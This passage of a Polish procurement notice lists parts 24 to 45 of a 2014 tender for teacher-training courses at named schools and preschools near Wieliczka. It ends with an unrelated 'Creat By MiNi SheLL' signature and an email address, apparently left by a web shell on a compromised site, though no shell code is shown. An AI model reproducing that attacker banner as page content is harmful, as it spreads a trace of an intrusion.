<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole Koźmice Wielkie  Koźmice Wielkie 427 32-020 Wieliczka. Wymagane elementy szkolenia: podstawowe informacje nt. zaburzeń ze spektrum autyzmu (rozwój poznawczy, społeczny, emocjonalny); konkretne techniki pracy z dzieckiem ze spektrum autyzmu w praktyce przedszkolnej; jak zintegrować dziecko ze specjalnymi potrzebami edukacyjnymi z grupą; analiza indywidualnych przypadków; przykłady dobrych praktyk, literatura fachowa, przygotowywanie pomocy dydaktycznych oraz warsztat: metoda Weroniki Sherborne - techniki relaksacyjne, praca z ciałem ze szczególnym uwzględnieniem praktycznej nauki masażu. Konsultacje w zakresie: metoda Weroniki Sherborne , przykłady dobrych praktyk, rozmowa dotycząca problemów w pracy z konkretnych dzieckiem w przedszkolu i wypracowanie metod pozwalających radzić sobie w przyszłości z podobnymi sytuacjami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Sposoby motywowania uczniów do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im.  Macieja Szarka w Grabiu Grabie 2, 32-002 Węgrzce Wielkie. Wymagane elementy szkolenia: przegląd aktualnie stosowanych w Polsce i na świecie metod motywowania uczniów, wzmacniania ich kreatywności i aktywności własnej. Metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów. Gry i zabawy rozbudzające motywację - do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników. Przykłady dobrych praktyk. Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Radzenie sobie z trudnościami emocjonalnymi i wychowawczymi u uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła podstawowa Nr 3 im. Włodzimierza Puchalskiego w Niepołomicach,  ul. Krakowska 14, 32-005 Niepołomice. Wymagane elementy szkolenia: szkolenie prowadzone metodą aktywną - warsztaty dla nauczycieli, np. w formie psychodramy. Ponadto praktyczne sposoby radzenia sobie przez nauczycieli  z trudnościami emocjonalnymi i wychowawczymi  u uczniów (szkoła podstawowa), rozwiązywanie konkretnych problemów, poprawa komunikacji z uczniem. Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Jak motywować uczniów do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Marszałka Józefa Piłsudskiego w Zagórzu Zagórze 81 32-005 Niepołomice. Wymagane elementy szkolenia: przegląd aktualnie stosowanych w Polsce i na świecie metod motywowania uczniów, wzmacniania ich kreatywności i aktywności własnej. Metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów. Gry i zabawy rozbudzające motywację - do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników. Przykłady dobrych praktyk. Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Skuteczne komunikowanie się w zespole nauczycieli oraz z rodzicami i uczniami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Świętej Jadwigi Królowej w Szarowie  Szarów 302  32-014 Brzezie. Wymagane elementy szkolenia: przedstawienie elementów prawidłowej komunikacji, zasad poprawnej komunikacji, przedstawienie barier komunikacyjnych oraz zasad aktywnego słuchania, przedstawienie metod komunikacji i pracy z dzieckiem, przedstawienie zasad współpracy i efektywnej komunikacji z rodzicami uczniów. Konsultacje w zakresie tematyki szkolenia (sugerowany warsztat).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Radzenie sobie z trudnymi zachowaniami uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum w Szarowie, Szarów 302  32-014 Brzezie. Wymagane elementy szkolenia:  praktyczne sposoby postępowania z uczniem w sytuacjach konfliktowych; radzenie sobie z trudnościami wychowawczymi głównie u uczniów gimnazjum, ale nie tylko (również szkoła podstawowa), efektywna komunikacja z rodzicami. Sugerowana forma: wasztaty.  Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Przedszkolak ze specjalnymi potrzebami edukacyjnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole Samorządowe w Dąbrowie Dąbrowa 1, 32-014 Brzezie. Wymagane elementy szkolenia: wprowadzenie do tematyki SPE, przedstawienie możliwych metod pracy z dziećmi z: autyzmem,  ADHD, upośledzeniem słuchu, upośledzeniem wzroku, niepełnosprawnością ruchową, upośledzeniem umysłowym, chorobą przewlekłą, niedostosowaniem społecznym lub zagrożeniem niedostosowaniem, trudnościami adaptacyjnymi związanymi ze zmianami kulturowymi, innymi potrzebami; praktyczne metody pracy z małymi dziećmi z specjalnymi potrzebami edukacyjnymi. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Ocenianie kształtujące - wprowadzenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła podstawowa im. Wojska Polskiego w Bodzanowie  Bodzanów 128, 32-020 Wieliczka. Wymagane elementy szkolenia: idea oceniania kształtującego w szkole, elementy oceniania kształtującego, korzyści i zagrożenia podczas stosowania oceniania kształtującego, opinie nauczycieli stosujących ocenianie kształtujące, ocenianie kształtujące jako sposób na budowanie atmosfery sprzyjającej uczeniu się. Konsultacje w zakresie: warsztaty dla nauczycieli doskonalące umiejętności stosowania oceniania kształtującego, zaplanowanie lekcji wychowawczych dla uczniów oraz spotkania z rodzicami poświęconych wprowadzeniu oceniania kształtującego lub jego elementów do praktyki szkolnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> TIK jako narzędzie pracy nauczyciela w szkole podstawowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Tadeusza Kościuszki w Przebieczanach  32-020 Przebieczany 213. Wymagane elementy szkolenia: technologie informacyjno-komunikacyjne w realizacji zadań edukacyjnych. Konsultacje w zakresie: praktyczne wykorzystanie portalu wiedzy i zasobów dla nauczycieli Scholaris , Khan Academy po polsku, otwartych zasobów edukacyjnych a także innych źródeł w Internecie, jak zaplanować spotkania szkoleniowo-informacyjne dla rodziców poświęcone bezpieczeństwu w Internecie i kontroli rodzicielskiej?
Jak rozmawiać z uczniami na temat bezpieczeństwa  w Internecie?.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Jak budować dumę z bycia uczniem Gimnazjum w Niepołomicach?.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum im. Króla Władysława Jagiełły w Niepołomicach,  Szkolna 3, 32-005 Niepołomice. Wymagane elementy szkolenia: warunki niezbędne do budowania pozytywnego wizerunku Szkoły Jak budować dumę z bycia uczniem Gimnazjum w Niepołomicach. Konsultacje w zakresie: jak pisać artykuły do lokalnych mediów, aby były one drukowane, i aby zawarta w nich informacja budziła pozytywne skojarzenia ze szkołą - warsztaty, jak przeprowadzić skuteczną promocję Gimnazjum w środowisku lokalnym przy zaangażowaniu uczniów, Rady Gimnazjum i Rady Rodziców - warsztaty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych dziecka ze specjalnymi potrzebami edukacyjnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Marii Konopnickiej z Oddziałami integracyjnymi GrodkowicachGrodkowice 80, 32-015 Kłaj. Wymagane elementy szkolenia: omówienie zakresu i sposobów dostosowania wymagań edukacyjnych, przedstawienie modelu  zespołowego planowania pracy z uczniem o specjalnych potrzebach edukacyjnych (przykłady dobrych praktyk), omówienie czym należy się kierować i w jaki sposób dobierać: treści nauczania, metody i formy pracy  oraz sposoby oceniania i motywowania, analiza przykładów zgłaszanych przez nauczycieli; praktyczne rozwiązania w zakresie przekazywania treści programowych w klasach integracyjnych (uczniowie o bardzo zróżnicowanym poziomie umiejętności). Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Wypracowanie prawidłowej współpracy z rodzicami w obszarze sytuacji trudnych - gimnazjum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum - Zespół Szkół Ogólnokształcących im. Ks. Jana Twardowskiego w KłajuKłaj 361 32-015 Kłaj. Wymagane elementy szkolenia: umiejętności pracy zespołu nauczycielskiego z rodzicami w obszarze sytuacji trudnych (rozbieżność oczekiwań, rodzina niewydolna wychowawczo, samotny rodzic, agresja ucznia, postawy uczniowskie). Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Efektywne rozwiązywanie sytuacji trudnych w szkole - szkoła podstawowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła podstawowa - Zespół Szkół Ogólnokształcących im. Ks. Jana Twardowskiego w Kłaju, Kłaj 361 32-015 Kłaj. Wymagane elementy szkolenia: program szkolenia ma dotyczyć takiej organizacji pracy zespołów nauczycielskich, by efektywnie radziły sobie z rozwiązywaniem trudnych sytuacji w szkole (postawy uczniowskie, osamotnienie uczniów, kultura osobista, język uczniowski, depresja uczniowska). Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Praca z uczniem o specjalnych potrzebach edukacyjnych, w tym uczniem zdolnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa nr 2 im. Tadeusza Kościuszki w Wieliczce z filią w Sułkowie.ul. Moniuszki 1, 32-020 Wieliczka. Wymagane elementy szkolenia: konkretne przykłady metod/strategii edukacyjnych ułatwiających pracę z uczniami o specjalnych potrzebach edukacyjnych, w tym - co ważne - z uczniem zdolnym. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Techniki uczenia się i metody aktywizujące ucznia do pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki:  Szkoła Podstawowa im. Św. Jadwigi Królowej Polski w Podłężu, 32-003 Podłęże 220. Wymagane elementy szkolenia: praktyczne przećwiczenie metod aktywizujących ucznia do pracy, technik uczenia się, ze szczególnym uwzględnieniem informacji zwrotnej. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Sposoby motywowania ucznia do nauki i techniki uczenia się.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa Tadeusza Kościuszki w Wiatowicach, 32-420 Gdów  Wiatowice 61. Wymagane elementy szkolenia: rozwijanie odpowiedzialności uczniów za własny sukces dydaktyczny; metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów; praktyczne techniki uczenia się do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników, praktyczne umiejętności motywowania rodziców do wspierania dzieci w procesie edukacji. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Metody motywacji ucznia do nauki, techniki uczenia się.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Henryka Sienkiewicza w Zręczycach, 32-420 Gdów Zręczyce 222. Wymagane elementy szkolenia: prezentacja metod i technik wspomagających pamięć i uczenie się; metody motywowania ucznia do nauki, tworzenie sojuszu rodzic - nauczyciel w motywowaniu dzieci. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Zasady pracy z uczniami  o specjalnych potrzebach edukacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im Kornela Makuszyńskiego w Jaroszówce, Jaroszówka 59 32-420 Gdów. Wymagane elementy szkolenia: zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia ; szczególnie chodzi o uczniów z objawami zaburzeń zachowania; wstęp do metod szybkiego czytania; poznanie sposobów na kształtowanie u uczniów samodzielnego uczenia się; umiejętności posługiwania się mnemotechnikami. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Zasady pracy z uczniami  o specjalnych potrzebach edukacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole Kłaj, Kłaj 651 32-015 Kłaj. Wymagane elementy szkolenia: dostarczenie praktycznej, konkretnej wiedzy dotyczącej normy rozwojowej i zaburzeń w danym wieku u dziecka; propozycje radzenia sobie z trudnymi zachowaniami u dzieci na każdym etapie rozwoju. Kostulskie w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Techniki  uczenia się i metody motywujące do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Jana Pawła II w Golkowicach, Golkowice 1 30-698 Kraków. Wymagane elementy szkolenia: Sposoby diagnozowania uczniów pod kątem doboru odpowiednich dla nich technik uczenia się. Konkretne przykłady technik uczenia się - na 2 poziomy edukacyjne ( klasy 0-3 oraz 4-6) , powiązanie z metodami dostosowanymi do różnych preferencji sensorycznych. Przykłady narzędzi ewaluacji pracy uczniów - po stosowaniu na lekcjach różnych technik uczenia się i motywacji. Motywacja uczniów zdolnych i z SPE.  - szkolenie z elementami warsztatu pokazującego stosowanie różnych technik i metod. Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Efektywne sposoby pracy z dzieckiem w przedszkolu we współpracy z rodzicami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Samorządowe Przedszkole w Mietniowie, Mietniów 60 32-020 Wieliczka. Wymagane elementy szkolenia: alternatywne ujęcia tematu, praktyczne sposoby radzenia sobie z problemami u dzieci w wielu przedszkolnym; podnoszenie efektywności pracy z dzieckiem oraz polepszenie kontaktu z rodzicem; diagnoza słabych i mocnych stron dziecka, planowanie działań wspierających wobec dzieci, tworzenie programu z określeniem metod, form i środków dydaktycznych, wspomaganie rozwoju dziecka - praktyczne sposoby pracy z dzieckiem oraz rodzicem. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Efektywne sposoby pracy z dzieckiem o specjalnych potrzebach edukacyjnych w przedszkolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole Samorządowe w Trąbkach,   Trąbki 312 32-020 Wieliczka. Wymagane elementy szkolenia:  alternatywne ujęcia tematu, praktyczne sposoby radzenia sobie z zaburzeniami rozwojowymi u dzieci w wielu przedszkolnym; podnoszenie efektywności pracy z dzieckiem o specjalnych potrzebach edukacyjnych w przedszkolu; rozpoznanie u dzieci specjalnych potrzeb edukacyjnych (diagnoza słabych i mocnych stron dziecka); planowanie działań wspierających wobec dzieci, tworzenie programu z określeniem metod, form i środków dydaktycznych, wspomaganie rozwoju dziecka - praktyczne sposoby pracy z dzieckiem. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com